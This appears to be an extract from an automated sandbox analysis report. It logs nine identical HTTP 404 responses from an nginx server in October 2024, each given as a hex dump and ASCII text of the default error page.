                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Sat, 26 Oct 2024 05:27:24 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Sat, 26 Oct 2024 05:27:26 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Sat, 26 Oct 2024 05:27:29 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Sat, 26 Oct 2024 05:27:31 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Sat, 26 Oct 2024 05:27:51 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Sat, 26 Oct 2024 05:27:54 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Sat, 26 Oct 2024 05:27:57 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Sat, 26 Oct 2024 05:28:00 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Sat, 26 Oct 2024 05:28:04 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
